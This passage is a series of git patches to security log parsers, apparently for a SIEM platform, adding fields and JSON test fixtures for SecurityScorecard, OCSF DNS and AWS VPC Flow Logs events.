+        "id": "f14ab432-7e97-4570-a29d-254f41dbb9db"
+      },
+      "observer": {
+        "gcap": {
+          "hostname": "gcap-interne-rd-55.gatewatcher.com",
+          "version": "2.5.3.107"
+        },
+        "log_format_version": "1.0.0"
+      },
+      "version": "1"
+    },
+    "observer": {
+      "hostname": "gcenter-interne-rd-56.gatewatcher.com",
+      "product": "gcenter",
+      "vendor": "gatewatcher",
+      "version": "2.5.3.103"
+    },
+    "related": {
+      "hosts": [
+        "gcenter-interne-rd-56.gatewatcher.com"
+      ]
+    }
+  }
+}
\ No newline at end of file

From 693134cf5c046709e1f8de03ec7914e70858974b Mon Sep 17 00:00:00 2001
From: Clement Lyonnet <clement.lyonnet@gatewatcher.com>
Date: Mon, 16 Sep 2024 14:29:58 +0200
Subject: [PATCH 027/317] Delete a line

---
 GateWatcher/aioniq/ingest/parser.yml | 1 -
 1 file changed, 1 deletion(-)

diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml
index 894264d2b..7679c02a1 100644
--- a/GateWatcher/aioniq/ingest/parser.yml
+++ b/GateWatcher/aioniq/ingest/parser.yml
@@ -240,4 +240,3 @@ stages:
           gatewatcher.targeted_organizations: '{{json_load.message.targeted_organizations}}'
         filter: ''
         name: set
-

From 1123c27bae68431662f2d6c274b48a617026f0c8 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Mon, 16 Sep 2024 16:34:25 +0200
Subject: [PATCH 028/317] Enhancement/SecurityScoreCard: Add custom fields

---
 .../_meta/fields.yml                          | 15 +++++++
 .../ingest/parser.yml                         |  3 ++
 .../tests/breach_reported_event.json          |  3 +-
 .../{issue_event.json => issue_event_01.json} |  3 +-
 .../tests/issue_event_02.json                 | 44 +++++++++++++++++++
 .../tests/issue_event_03.json                 | 44 +++++++++++++++++++
 6 files changed, 110 insertions(+), 2 deletions(-)
 rename SecurityScorecard/vulnerability_assessment_scanner/tests/{issue_event.json => issue_event_01.json} (96%)
 create mode 100644 SecurityScorecard/vulnerability_assessment_scanner/tests/issue_event_02.json
 create mode 100644 SecurityScorecard/vulnerability_assessment_scanner/tests/issue_event_03.json

diff --git a/SecurityScorecard/vulnerability_assessment_scanner/_meta/fields.yml b/SecurityScorecard/vulnerability_assessment_scanner/_meta/fields.yml
index 98504880c..f425d610d 100644
--- a/SecurityScorecard/vulnerability_assessment_scanner/_meta/fields.yml
+++ b/SecurityScorecard/vulnerability_assessment_scanner/_meta/fields.yml
@@ -3,11 +3,21 @@ securityscorecard.vas.breach.root_cause:
   name: securityscorecard.vas.breach.root_cause
   type: keyword
 
+securityscorecard.vas.current_score:
+  description: Scorecard current score
+  name: securityscorecard.vas.current_score
+  type: number
+
 securityscorecard.vas.id:
   description: Scorecard event id
   name: securityscorecard.vas.id
   type: keyword
 
+securityscorecard.vas.previous_score:
+  description: Scorecard previous score
+  name: securityscorecard.vas.previous_score
+  type: number
+
 securityscorecard.vas.selected:
   description: Scorecard event selected
   name: securityscorecard.vas.selected
@@ -17,3 +27,8 @@ securityscorecard.vas.severity:
   description: Scorecard event severity
   name: securityscorecard.vas.severity
   type: keyword
+
+securityscorecard.vas.type:
+  description: Scorecard event type
+  name: securityscorecard.vas.type
+  type: keyword
diff --git a/SecurityScorecard/vulnerability_assessment_scanner/ingest/parser.yml b/SecurityScorecard/vulnerability_assessment_scanner/ingest/parser.yml
index 0d72affb2..6e71ead09 100644
--- a/SecurityScorecard/vulnerability_assessment_scanner/ingest/parser.yml
+++ b/SecurityScorecard/vulnerability_assessment_scanner/ingest/parser.yml
@@ -33,9 +33,12 @@ stages:
           cloud.account.name: "{{parsed_event.message.domain}}"
           organization.name: "{{parsed_event.message.trigger.breach.company_name}}"
 
+          securityscorecard.vas.current_score: "{{parsed_event.message.current.score}}"
           securityscorecard.vas.id: "{{parsed_event.message.scorecard_id}}"
+          securityscorecard.vas.previous_score: "{{parsed_event.message.previous.score}}"
           securityscorecard.vas.selected: "{{parsed_event.message.trigger.selected}}"
           securityscorecard.vas.severity: "{{parsed_event.message.trigger.severity}}"
+          securityscorecard.vas.type: "{{parsed_event.message.trigger.type}}"
 
       - set:
           event.kind: "alert"
diff --git a/SecurityScorecard/vulnerability_assessment_scanner/tests/breach_reported_event.json b/SecurityScorecard/vulnerability_assessment_scanner/tests/breach_reported_event.json
index 7d98930f7..2a1ecd7c3 100644
--- a/SecurityScorecard/vulnerability_assessment_scanner/tests/breach_reported_event.json
+++ b/SecurityScorecard/vulnerability_assessment_scanner/tests/breach_reported_event.json
@@ -34,7 +34,8 @@
         "breach": {
           "root_cause": "hacked"
         },
-        "id": "8e21f4aa-ee49-5f6d-be70-366b95ecc586"
+        "id": "8e21f4aa-ee49-5f6d-be70-366b95ecc586",
+        "type": "breach_reported"
       }
     }
   }
diff --git a/SecurityScorecard/vulnerability_assessment_scanner/tests/issue_event.json b/SecurityScorecard/vulnerability_assessment_scanner/tests/issue_event_01.json
similarity index 96%
rename from SecurityScorecard/vulnerability_assessment_scanner/tests/issue_event.json
rename to SecurityScorecard/vulnerability_assessment_scanner/tests/issue_event_01.json
index a4b803c07..fcbd60ed0 100644
--- a/SecurityScorecard/vulnerability_assessment_scanner/tests/issue_event.json
+++ b/SecurityScorecard/vulnerability_assessment_scanner/tests/issue_event_01.json
@@ -28,7 +28,8 @@
       "vas": {
         "id": "8e21f4aa-ee49-5f6d-be70-366b95ecc586",
         "selected": "by_severity",
-        "severity": "low"
+        "severity": "low",
+        "type": "new_issues"
       }
     }
   }
diff --git a/SecurityScorecard/vulnerability_assessment_scanner/tests/issue_event_02.json b/SecurityScorecard/vulnerability_assessment_scanner/tests/issue_event_02.json
new file mode 100644
index 000000000..e90b95d98
--- /dev/null
+++ b/SecurityScorecard/vulnerability_assessment_scanner/tests/issue_event_02.json
@@ -0,0 +1,44 @@
+{
+  "input": {
+    "message": "{\n  \"trigger\": {\n    \"type\": \"new_issues\",\n    \"issues\": {\n      \"tls_weak_protocol\": {\n        \"departed\": { \"count\": 1 },\n        \"active\": { \"count\": 1 }\n      },\n      \"tls_weak_cipher\": {\n        \"departed\": { \"count\": 2 },\n        \"active\": { \"count\": 2 }\n      }\n    },\n    \"selected\": \"by_severity\",\n    \"severity\": \"low\"\n  },\n  \"created_at\": \"2024-07-12T04:54:27.941Z\",\n  \"execution_id\": \"8a1be922-6698-4407-ba70-0515943d323e\",\n  \"scorecard_id\": \"56f0fca6-f6e0-55fd-9fce-b75ba65db80e\",\n  \"domain\": \"example.com\",\n  \"previous\": { \"score\": 90, \"factors\": {} },\n  \"current\": { \"score\": 90, \"factors\": {} },\n  \"platform_score_date\": 20240710\n}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "SecurityScorecard Vulnerability Assessment Scanner",
+        "dialect_uuid": "8f472113-ba5b-45b9-9a2c-944834396333"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\n  \"trigger\": {\n    \"type\": \"new_issues\",\n    \"issues\": {\n      \"tls_weak_protocol\": {\n        \"departed\": { \"count\": 1 },\n        \"active\": { \"count\": 1 }\n      },\n      \"tls_weak_cipher\": {\n        \"departed\": { \"count\": 2 },\n        \"active\": { \"count\": 2 }\n      }\n    },\n    \"selected\": \"by_severity\",\n    \"severity\": \"low\"\n  },\n  \"created_at\": \"2024-07-12T04:54:27.941Z\",\n  \"execution_id\": \"8a1be922-6698-4407-ba70-0515943d323e\",\n  \"scorecard_id\": \"56f0fca6-f6e0-55fd-9fce-b75ba65db80e\",\n  \"domain\": \"example.com\",\n  \"previous\": { \"score\": 90, \"factors\": {} },\n  \"current\": { \"score\": 90, \"factors\": {} },\n  \"platform_score_date\": 20240710\n}",
+    "event": {
+      "action": "new_issues",
+      "category": [
+        "vulnerability"
+      ],
+      "dataset": "issue",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-07-12T04:54:27.941000Z",
+    "cloud": {
+      "account": {
+        "name": "example.com"
+      }
+    },
+    "observer": {
+      "product": "Vulnerability Assessment Scanner",
+      "vendor": "SecurityScorecard"
+    },
+    "securityscorecard": {
+      "vas": {
+        "current_score": 90,
+        "id": "56f0fca6-f6e0-55fd-9fce-b75ba65db80e",
+        "previous_score": 90,
+        "selected": "by_severity",
+        "severity": "low",
+        "type": "new_issues"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/SecurityScorecard/vulnerability_assessment_scanner/tests/issue_event_03.json b/SecurityScorecard/vulnerability_assessment_scanner/tests/issue_event_03.json
new file mode 100644
index 000000000..4ccd274c8
--- /dev/null
+++ b/SecurityScorecard/vulnerability_assessment_scanner/tests/issue_event_03.json
@@ -0,0 +1,44 @@
+{
+  "input": {
+    "message": "{\n  \"trigger\": {\n    \"type\": \"new_issues\",\n    \"issues\": {\n      \"tlscert_excessive_expiration\": { \"active\": { \"count\": 1 } },\n      \"tlscert_no_revocation\": { \"active\": { \"count\": 1 } },\n      \"csp_no_policy_v2\": { \"active\": { \"count\": 1 } },\n      \"insecure_https_redirect_pattern_v2\": { \"active\": { \"count\": 3 } },\n      \"redirect_chain_contains_http_v2\": { \"active\": { \"count\": 9 } },\n      \"tls_weak_protocol\": {\n        \"departed\": { \"count\": 1 },\n        \"active\": { \"count\": 1 }\n      },\n      \"tls_weak_cipher\": { \"active\": { \"count\": 1 } },\n      \"unsafe_sri_v2\": { \"active\": { \"count\": 1 } },\n      \"hsts_incorrect_v2\": { \"active\": { \"count\": 1 } },\n      \"x_content_type_options_incorrect_v2\": { \"active\": { \"count\": 1 } }\n    },\n    \"selected\": \"by_severity\",\n    \"severity\": \"low\"\n  },\n  \"created_at\": \"2024-07-11T07:47:17.165Z\",\n  \"execution_id\": \"4c5395cc-0161-402f-896f-477966c2386d\",\n  \"scorecard_id\": \"d332f6dd-ec0e-57bf-9086-31ddd68095c9\",\n  \"domain\": \"example.com\",\n  \"previous\": {\n    \"score\": 88,\n    \"factors\": { \"application_security\": 85, \"network_security\": 85 }\n  },\n  \"current\": {\n    \"score\": 88,\n    \"factors\": { \"application_security\": 84, \"network_security\": 84 }\n  },\n  \"platform_score_date\": 20240709\n}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "SecurityScorecard Vulnerability Assessment Scanner",
+        "dialect_uuid": "8f472113-ba5b-45b9-9a2c-944834396333"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\n  \"trigger\": {\n    \"type\": \"new_issues\",\n    \"issues\": {\n      \"tlscert_excessive_expiration\": { \"active\": { \"count\": 1 } },\n      \"tlscert_no_revocation\": { \"active\": { \"count\": 1 } },\n      \"csp_no_policy_v2\": { \"active\": { \"count\": 1 } },\n      \"insecure_https_redirect_pattern_v2\": { \"active\": { \"count\": 3 } },\n      \"redirect_chain_contains_http_v2\": { \"active\": { \"count\": 9 } },\n      \"tls_weak_protocol\": {\n        \"departed\": { \"count\": 1 },\n        \"active\": { \"count\": 1 }\n      },\n      \"tls_weak_cipher\": { \"active\": { \"count\": 1 } },\n      \"unsafe_sri_v2\": { \"active\": { \"count\": 1 } },\n      \"hsts_incorrect_v2\": { \"active\": { \"count\": 1 } },\n      \"x_content_type_options_incorrect_v2\": { \"active\": { \"count\": 1 } }\n    },\n    \"selected\": \"by_severity\",\n    \"severity\": \"low\"\n  },\n  \"created_at\": \"2024-07-11T07:47:17.165Z\",\n  \"execution_id\": \"4c5395cc-0161-402f-896f-477966c2386d\",\n  \"scorecard_id\": \"d332f6dd-ec0e-57bf-9086-31ddd68095c9\",\n  \"domain\": \"example.com\",\n  \"previous\": {\n    \"score\": 88,\n    \"factors\": { \"application_security\": 85, \"network_security\": 85 }\n  },\n  \"current\": {\n    \"score\": 88,\n    \"factors\": { \"application_security\": 84, \"network_security\": 84 }\n  },\n  \"platform_score_date\": 20240709\n}",
+    "event": {
+      "action": "new_issues",
+      "category": [
+        "vulnerability"
+      ],
+      "dataset": "issue",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-07-11T07:47:17.165000Z",
+    "cloud": {
+      "account": {
+        "name": "example.com"
+      }
+    },
+    "observer": {
+      "product": "Vulnerability Assessment Scanner",
+      "vendor": "SecurityScorecard"
+    },
+    "securityscorecard": {
+      "vas": {
+        "current_score": 88,
+        "id": "d332f6dd-ec0e-57bf-9086-31ddd68095c9",
+        "previous_score": 88,
+        "selected": "by_severity",
+        "severity": "low",
+        "type": "new_issues"
+      }
+    }
+  }
+}
\ No newline at end of file

From 776cabfdee06228b01e99b467f420e98c10bba8b Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Mon, 16 Sep 2024 16:38:59 +0200
Subject: [PATCH 029/317] fix(OCSF): fix the way to extract dns.id and
 dns.answers

---
 OCSF/ocsf/ingest/parser.yml              | 21 +++----
 OCSF/ocsf/tests/test_dns_activity_1.json | 17 +++---
 OCSF/ocsf/tests/test_dns_activity_2.json | 73 ++++++++++++++++++++++++
 3 files changed, 91 insertions(+), 20 deletions(-)
 create mode 100644 OCSF/ocsf/tests/test_dns_activity_2.json

diff --git a/OCSF/ocsf/ingest/parser.yml b/OCSF/ocsf/ingest/parser.yml
index 91d9dd4e0..d63d70d8d 100644
--- a/OCSF/ocsf/ingest/parser.yml
+++ b/OCSF/ocsf/ingest/parser.yml
@@ -919,18 +919,19 @@ stages:
       - set:
           dns.question.name: "{{ parse_event.message.query.hostname }}"
       - set:
-          dns.id: >
+          dns.id: "{{ parse_event.message.query.packet_uid }}"
+          dns.answers: >
             [
-              {%- for item in parse_event.message.answers -%}{% if item.packed_uid %}'{{item.packet_uid}}',{% endif %}{%- endfor -%}
-              {% if parse_event.message.query.packet_uid != null %}'{{ parse_event.message.query.packet_uid }}'{% endif %}
+            {%- for item in parse_event.message.answers -%}
+            {
+                {%- if item.class != null -%}"class": "{{item.class}}",{%- endif -%}
+                {%- if item.type != null -%}"type": "{{item.type}}",{%- endif -%}
+                {%- if item.ttl != null -%}"ttl": "{{item.ttl}}",{%- endif -%}
+                {%- if item.rdata != null -%}"data": "{{item.rdata}}",{%- endif -%}
+            }
+            {%- endfor -%}
             ]
-          dns.answers.class: >
-            [{%- for item in parse_event.message.answers -%}{%- if item.class -%}'{{item.class}}',{%- endif -%}{%- endfor -%}]
-          dns.answers.type: >
-            [{%- for item in parse_event.message.answers -%}{%- if item.type -%}'{{item.type}}',{%- endif -%}{%- endfor -%}]
-          dns.answers.ttl: >
-            [{%- for item in parse_event.message.answers -%}{%- if item.ttl -%}'{{item.ttl}}',{%- endif -%}{%- endfor -%}]
-        filter: "{{ parse_event.message.answers != null }}"
+        filter: "{{ parse_event.message.get('answers') != None }}"
       - set:
           dns.question.class:
             - "{{ parse_event.message.query.class }}"
diff --git a/OCSF/ocsf/tests/test_dns_activity_1.json b/OCSF/ocsf/tests/test_dns_activity_1.json
index 7567bb466..813601c8c 100644
--- a/OCSF/ocsf/tests/test_dns_activity_1.json
+++ b/OCSF/ocsf/tests/test_dns_activity_1.json
@@ -25,16 +25,13 @@
       "region": "us-east-1"
     },
     "dns": {
-      "answers": {
-        "class": [
-          "IN"
-        ],
-        "ttl": [],
-        "type": [
-          "A"
-        ]
-      },
-      "id": [],
+      "answers": [
+        {
+          "class": "IN",
+          "data": "127.0.0.62",
+          "type": "A"
+        }
+      ],
       "question": {
         "class": [
           "IN"
diff --git a/OCSF/ocsf/tests/test_dns_activity_2.json b/OCSF/ocsf/tests/test_dns_activity_2.json
new file mode 100644
index 000000000..5785c3053
--- /dev/null
+++ b/OCSF/ocsf/tests/test_dns_activity_2.json
@@ -0,0 +1,73 @@
+{
+  "input": {
+    "message": "{\"metadata\":{\"product\":{\"version\":\"1.100000\",\"name\":\"Route 53\",\"feature\":{\"name\":\"Resolver Query Logs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"provider\":\"AWS\"},\"src_endpoint\":{\"vpc_uid\":\"vpc-11111111\",\"ip\":\"1.2.3.4\",\"port\":63115,\"instance_uid\":\"i-11111111111111111\"},\"time\":1726088328000,\"time_dt\":1726088328000,\"query\":{\"hostname\":\"_ldap._tcp.dc.example.org.\",\"type\":\"SRV\",\"class\":\"IN\"},\"answers\":null,\"connection_info\":{\"protocol_name\":\"UDP\",\"direction\":\"Unknown\",\"direction_id\":0},\"dst_endpoint\":null,\"firewall_rule\":null,\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"DNS Activity\",\"class_uid\":4003,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_id\":6,\"activity_name\":\"Traffic\",\"type_uid\":400306,\"type_name\":\"DNS Activity: Traffic\",\"rcode_id\":3,\"rcode\":\"NXDomain\",\"disposition\":\"Unknown\",\"action\":\"Unknown\",\"action_id\":0,\"unmapped\":null,\"accountid\":null,\"region\":null,\"asl_version\":null,\"observables\":[{\"name\":\"src_endpoint.instance_uid\",\"value\":\"i-11111111111111111\",\"type\":\"Resource UID\",\"type_id\":10},{\"name\":\"query.hostname\",\"value\":\"_ldap._tcp.dc.example.org.\",\"type\":\"Hostname\",\"type_id\":1},{\"name\":\"src_endpoint.ip\",\"value\":\"1.2.3.4\",\"type\":\"IP Address\",\"type_id\":2}]}\n",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "OCSF",
+        "dialect_uuid": "a9c959ac-78ec-47a4-924e-8156a77cebf5"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"metadata\":{\"product\":{\"version\":\"1.100000\",\"name\":\"Route 53\",\"feature\":{\"name\":\"Resolver Query Logs\"},\"vendor_name\":\"AWS\"},\"profiles\":[\"cloud\",\"security_control\",\"datetime\"],\"version\":\"1.1.0\"},\"cloud\":{\"account\":{\"uid\":\"111111111111\"},\"region\":\"eu-west-3\",\"provider\":\"AWS\"},\"src_endpoint\":{\"vpc_uid\":\"vpc-11111111\",\"ip\":\"1.2.3.4\",\"port\":63115,\"instance_uid\":\"i-11111111111111111\"},\"time\":1726088328000,\"time_dt\":1726088328000,\"query\":{\"hostname\":\"_ldap._tcp.dc.example.org.\",\"type\":\"SRV\",\"class\":\"IN\"},\"answers\":null,\"connection_info\":{\"protocol_name\":\"UDP\",\"direction\":\"Unknown\",\"direction_id\":0},\"dst_endpoint\":null,\"firewall_rule\":null,\"severity_id\":1,\"severity\":\"Informational\",\"class_name\":\"DNS Activity\",\"class_uid\":4003,\"category_name\":\"Network Activity\",\"category_uid\":4,\"activity_id\":6,\"activity_name\":\"Traffic\",\"type_uid\":400306,\"type_name\":\"DNS Activity: Traffic\",\"rcode_id\":3,\"rcode\":\"NXDomain\",\"disposition\":\"Unknown\",\"action\":\"Unknown\",\"action_id\":0,\"unmapped\":null,\"accountid\":null,\"region\":null,\"asl_version\":null,\"observables\":[{\"name\":\"src_endpoint.instance_uid\",\"value\":\"i-11111111111111111\",\"type\":\"Resource UID\",\"type_id\":10},{\"name\":\"query.hostname\",\"value\":\"_ldap._tcp.dc.example.org.\",\"type\":\"Hostname\",\"type_id\":1},{\"name\":\"src_endpoint.ip\",\"value\":\"1.2.3.4\",\"type\":\"IP Address\",\"type_id\":2}]}\n",
+    "event": {
+      "action": "traffic",
+      "category": [
+        "network"
+      ],
+      "kind": "event",
+      "severity": 1,
+      "type": [
+        "info",
+        "protocol"
+      ]
+    },
+    "@timestamp": "2024-09-11T20:58:48Z",
+    "cloud": {
+      "account": {
+        "id": "111111111111"
+      },
+      "provider": "AWS",
+      "region": "eu-west-3"
+    },
+    "dns": {
+      "question": {
+        "class": [
+          "IN"
+        ],
+        "name": "_ldap._tcp.dc.example.org.",
+        "registered_domain": "example.org",
+        "subdomain": "_ldap._tcp.dc",
+        "top_level_domain": "org",
+        "type": [
+          "SRV"
+        ]
+      },
+      "response_code": "NXDomain"
+    },
+    "network": {
+      "direction": [
+        "unknown"
+      ]
+    },
+    "ocsf": {
+      "activity_id": 6,
+      "activity_name": "Traffic",
+      "class_name": "DNS Activity",
+      "class_uid": 4003
+    },
+    "related": {
+      "hosts": [
+        "_ldap._tcp.dc.example.org."
+      ],
+      "ip": [
+        "1.2.3.4"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4",
+      "port": 63115
+    }
+  }
+}
\ No newline at end of file

From fbdea857643f97c9502b26c3a9ac72a3aaf034fb Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Mon, 16 Sep 2024 17:00:00 +0200
Subject: [PATCH 030/317] AWS Flow Logs: Add custom fields

---
 AWS/aws-flow-logs/_meta/fields.yml           | 10 +++
 AWS/aws-flow-logs/ingest/parser.yml          |  3 +
 AWS/aws-flow-logs/tests/network_traffic.json | 73 ++++++++++++++++++++
 3 files changed, 86 insertions(+)
 create mode 100644 AWS/aws-flow-logs/tests/network_traffic.json

diff --git a/AWS/aws-flow-logs/_meta/fields.yml b/AWS/aws-flow-logs/_meta/fields.yml
index 496e3f21f..cef232431 100644
--- a/AWS/aws-flow-logs/_meta/fields.yml
+++ b/AWS/aws-flow-logs/_meta/fields.yml
@@ -17,3 +17,13 @@ action.type:
   description: The type of the action
   name: action.type
   type: keyword
+
+aws.flowlogs.subnet.id:
+  description: The ID of the subnet
+  name: aws.flowlogs.subnet.id
+  type: keyword
+
+aws.flowlogs.vpc.id:
+  description: The ID of the VPC
+  name: aws.flowlogs.vpc.id
+  type: keyword
diff --git a/AWS/aws-flow-logs/ingest/parser.yml b/AWS/aws-flow-logs/ingest/parser.yml
index dd21da061..94b310eb5 100644
--- a/AWS/aws-flow-logs/ingest/parser.yml
+++ b/AWS/aws-flow-logs/ingest/parser.yml
@@ -32,8 +32,11 @@ stages:
       - set:
           action.outcome: "{{parse_event.message.log_status | lower}}"
           action.type: "forward"
+          aws.flowlogs.subnet.id: "{{parse_event.message.subnet_id}}"
+          aws.flowlogs.vpc.id: "{{parse_event.message.vpc_id}}"
           cloud.provider: "aws"
           cloud.account.id: "{{parse_event.message.account_id}}"
+          cloud.instance.id: "{{parse_event.message.instance_id}}"
           destination.port: "{{parse_event.message.dstport}}"
           event.category: '["network"]'
           event.start: "{{parse_start_date.datetime}}"
diff --git a/AWS/aws-flow-logs/tests/network_traffic.json b/AWS/aws-flow-logs/tests/network_traffic.json
new file mode 100644
index 000000000..3c668b6a6
--- /dev/null
+++ b/AWS/aws-flow-logs/tests/network_traffic.json
@@ -0,0 +1,73 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "AWS VPC Flow logs",
+        "dialect_uuid": "07c0cac8-f68f-11ea-adc1-0242ac120002"
+      }
+    },
+    "message": "{\"version\":5,\"account_id\":\"012345678901\",\"interface_id\":\"eni-1235b8ca123456789\",\"srcaddr\":\"1.2.3.4\",\"dstaddr\":\"5.6.7.8\",\"srcport\":25238.0,\"dstport\":8080.0,\"protocol\":6.0,\"packets\":5.0,\"bytes\":412.0,\"start\":1726491185,\"end\":1726491211,\"action\":\"ACCEPT\",\"log_status\":\"OK\",\"vpc_id\":\"vpc-0123456789abcdefg\",\"subnet_id\":\"subnet-0123456789abcdefg\",\"instance_id\":\"-\",\"tcp_flags\":3.0,\"type\":\"IPv4\",\"pkt_srcaddr\":\"1.2.3.4\",\"pkt_dstaddr\":\"5.6.7.8\",\"region\":\"eu-west-1\",\"az_id\":\"euw1-az3\",\"sublocation_type\":\"-\",\"sublocation_id\":\"-\",\"pkt_src_aws_service\":\"-\",\"pkt_dst_aws_service\":\"-\",\"flow_direction\":\"ingress\",\"traffic_path\":null}"
+  },
+  "expected": {
+    "message": "{\"version\":5,\"account_id\":\"012345678901\",\"interface_id\":\"eni-1235b8ca123456789\",\"srcaddr\":\"1.2.3.4\",\"dstaddr\":\"5.6.7.8\",\"srcport\":25238.0,\"dstport\":8080.0,\"protocol\":6.0,\"packets\":5.0,\"bytes\":412.0,\"start\":1726491185,\"end\":1726491211,\"action\":\"ACCEPT\",\"log_status\":\"OK\",\"vpc_id\":\"vpc-0123456789abcdefg\",\"subnet_id\":\"subnet-0123456789abcdefg\",\"instance_id\":\"-\",\"tcp_flags\":3.0,\"type\":\"IPv4\",\"pkt_srcaddr\":\"1.2.3.4\",\"pkt_dstaddr\":\"5.6.7.8\",\"region\":\"eu-west-1\",\"az_id\":\"euw1-az3\",\"sublocation_type\":\"-\",\"sublocation_id\":\"-\",\"pkt_src_aws_service\":\"-\",\"pkt_dst_aws_service\":\"-\",\"flow_direction\":\"ingress\",\"traffic_path\":null}",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "end": "2024-09-16T12:53:31Z",
+      "outcome": "ok",
+      "start": "2024-09-16T12:53:05Z"
+    },
+    "@timestamp": "2024-09-16T12:53:05Z",
+    "action": {
+      "name": "accept",
+      "outcome": "ok",
+      "target": "network-traffic",
+      "type": "forward"
+    },
+    "aws": {
+      "flowlogs": {
+        "subnet": {
+          "id": "subnet-0123456789abcdefg"
+        },
+        "vpc": {
+          "id": "vpc-0123456789abcdefg"
+        }
+      }
+    },
+    "cloud": {
+      "account": {
+        "id": "012345678901"
+      },
+      "provider": "aws"
+    },
+    "destination": {
+      "address": "5.6.7.8",
+      "ip": "5.6.7.8",
+      "port": 8080.0
+    },
+    "network": {
+      "iana_number": "6.0"
+    },
+    "observer": {
+      "ingress": {
+        "interface": {
+          "name": "eni-1235b8ca123456789"
+        }
+      }
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4",
+        "5.6.7.8"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "bytes": 412.0,
+      "ip": "1.2.3.4",
+      "packets": 5.0,
+      "port": 25238.0
+    }
+  }
+}
\ No newline at end of file

From d67b031399f67b7cd50a78ab387addea667e5fdf Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Mon, 16 Sep 2024 17:04:32 +0200
Subject: [PATCH 031/317] fix on linting

---
 AWS/aws-flow-logs/tests/network_traffic.json | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/AWS/aws-flow-logs/tests/network_traffic.json b/AWS/aws-flow-logs/tests/network_traffic.json
index 3c668b6a6..b946752ed 100644
--- a/AWS/aws-flow-logs/tests/network_traffic.json
+++ b/AWS/aws-flow-logs/tests/network_traffic.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"version\":5,\"account_id\":\"012345678901\",\"interface_id\":\"eni-1235b8ca123456789\",\"srcaddr\":\"1.2.3.4\",\"dstaddr\":\"5.6.7.8\",\"srcport\":25238.0,\"dstport\":8080.0,\"protocol\":6.0,\"packets\":5.0,\"bytes\":412.0,\"start\":1726491185,\"end\":1726491211,\"action\":\"ACCEPT\",\"log_status\":\"OK\",\"vpc_id\":\"vpc-0123456789abcdefg\",\"subnet_id\":\"subnet-0123456789abcdefg\",\"instance_id\":\"-\",\"tcp_flags\":3.0,\"type\":\"IPv4\",\"pkt_srcaddr\":\"1.2.3.4\",\"pkt_dstaddr\":\"5.6.7.8\",\"region\":\"eu-west-1\",\"az_id\":\"euw1-az3\",\"sublocation_type\":\"-\",\"sublocation_id\":\"-\",\"pkt_src_aws_service\":\"-\",\"pkt_dst_aws_service\":\"-\",\"flow_direction\":\"ingress\",\"traffic_path\":null}",
     "sekoiaio": {
       "intake": {
         "dialect": "AWS VPC Flow logs",
         "dialect_uuid": "07c0cac8-f68f-11ea-adc1-0242ac120002"
       }
-    },
-    "message": "{\"version\":5,\"account_id\":\"012345678901\",\"interface_id\":\"eni-1235b8ca123456789\",\"srcaddr\":\"1.2.3.4\",\"dstaddr\":\"5.6.7.8\",\"srcport\":25238.0,\"dstport\":8080.0,\"protocol\":6.0,\"packets\":5.0,\"bytes\":412.0,\"start\":1726491185,\"end\":1726491211,\"action\":\"ACCEPT\",\"log_status\":\"OK\",\"vpc_id\":\"vpc-0123456789abcdefg\",\"subnet_id\":\"subnet-0123456789abcdefg\",\"instance_id\":\"-\",\"tcp_flags\":3.0,\"type\":\"IPv4\",\"pkt_srcaddr\":\"1.2.3.4\",\"pkt_dstaddr\":\"5.6.7.8\",\"region\":\"eu-west-1\",\"az_id\":\"euw1-az3\",\"sublocation_type\":\"-\",\"sublocation_id\":\"-\",\"pkt_src_aws_service\":\"-\",\"pkt_dst_aws_service\":\"-\",\"flow_direction\":\"ingress\",\"traffic_path\":null}"
+    }
   },
   "expected": {
     "message": "{\"version\":5,\"account_id\":\"012345678901\",\"interface_id\":\"eni-1235b8ca123456789\",\"srcaddr\":\"1.2.3.4\",\"dstaddr\":\"5.6.7.8\",\"srcport\":25238.0,\"dstport\":8080.0,\"protocol\":6.0,\"packets\":5.0,\"bytes\":412.0,\"start\":1726491185,\"end\":1726491211,\"action\":\"ACCEPT\",\"log_status\":\"OK\",\"vpc_id\":\"vpc-0123456789abcdefg\",\"subnet_id\":\"subnet-0123456789abcdefg\",\"instance_id\":\"-\",\"tcp_flags\":3.0,\"type\":\"IPv4\",\"pkt_srcaddr\":\"1.2.3.4\",\"pkt_dstaddr\":\"5.6.7.8\",\"region\":\"eu-west-1\",\"az_id\":\"euw1-az3\",\"sublocation_type\":\"-\",\"sublocation_id\":\"-\",\"pkt_src_aws_service\":\"-\",\"pkt_dst_aws_service\":\"-\",\"flow_direction\":\"ingress\",\"traffic_path\":null}",

From 141e6b8bbedea69c9068c33f127be0ae92d45361 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Mon, 16 Sep 2024 17:18:09 +0200
Subject: [PATCH 032/317] fix(OCSF): fix the way to extract vulnerabilities

---
 OCSF/ocsf/_meta/fields.yml                    |  5 +++
